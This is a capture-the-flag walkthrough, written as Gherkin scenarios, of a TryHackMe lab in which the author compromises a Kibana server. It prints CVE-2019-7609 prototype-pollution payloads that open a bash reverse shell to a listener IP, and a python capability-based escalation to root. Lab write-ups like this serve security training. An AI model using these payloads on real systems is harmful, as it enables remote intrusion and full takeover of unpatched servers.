## Version 2.0
## language: en
Feature: starters-www.tryhackme.com
  Site:
    www.tryhackme.com
  Category:
    Starters
  User:
    juan6630
  Goal:
    Retrieve the user and root flags.

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Windows 10      | 20H2        |
    | Mozilla Firefox | 85.0.2      |
    | Nmap            | 7.80        |
  Machine information:
    Given I start the challenge with the following IP address
    """
    10.10.160.255
    """
    When I access the machine via VPN
    Then I see a welcome page [evidence](welcome.png)

  Scenario: Fail: Source code search
    When I decide to search for information inside the source code
    Then I don't get an interesting result

  Scenario: Success: Research
    Given The site hint about prototype-based inheritance vulnerability
    When I search 'languages with prototype-based inheritance vulnerability'
    And I read the securitum article about prototype pollution
    """
    https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609
    """
    Then I get the first flag
    """
    Pro****** *********
    """
    And I get the third flag
    """
    CVE-****-****
    """

  Scenario: Success: Bash reverse shell
    Given I have a website
    When I scan with Nmap
    """
    nmap -A -T4 10.10.160.255 -p-
      PORT      STATE SERVICE VERSION
      22/tcp    open  ssh     OpenSSH 7.2p2
      80/tcp    open  http    Apache httpd 2.4.18(Ubuntu)
      5044/tcp  open  lxi-envtsvc?
      5601/tcp  open  esmagent?
      | fingerprint-string:
      |   GetRequest:
      |     HTTP/1.1  302 Found
      |     location: /app/kibana
      |     kbn-name: kibana
    """
    Then I checked the website at <<10.10.160.255:5601>>
    And I see the Kibana dashboard with the second flag
    """
    version *.*.*
    """
    When I set a listener with
    """
    nc -lvp 4444
    """
    And I go to the Timelion tab
    And I use a payload based on the article
    """
    .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash
                -i >& /dev/tcp/10.10.240.38/4444 0>&1");process.exit()//')
    .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
    """
    Then My payload is executed
    But My listener doesn't receive anything
    When I search for 'CVE-2019-7609' again
    And I found
    """
    https://github.com/mpgn/CVE-2019-7609
    """
    And I change the payload to
    """
    .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash
                 -c \'bash -i>& /dev/tcp/10.10.240.38/4444 0>&1\'");//')
    .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
    """
    Then I get a reverse shell [evidence](shell.png)
    And I get the user flag with
    """
    cd /home/kiba/
    cat user.txt
    """

  Scenario: Success: Privilege escalation
    Given I have a shell as kiba user
    When I search for 'linux capabilities'
    """
    https://www.vultr.com/docs/working-with-linux-capabilities
    """
    And I get the fifth flag
    """
    ****** -* /
    """
    Then I use <<getcap -r / 2>/dev/null>> [evidence](capabilities.png)
    When I use the python privilege escalation from
    """
    https://gtfobins.github.io/gtfobins/python/

    /home/kiba/.hackmeplease/python3 -c 'import os; os.setuid(0);
    os.system("/bin/bash")'
    """
    And I spawn a shell with
    """
    SHELL=/bin/bash
    """
    Then I get root access
    And I catch the last flag [evidence](root.png)
    And I solve the challenge
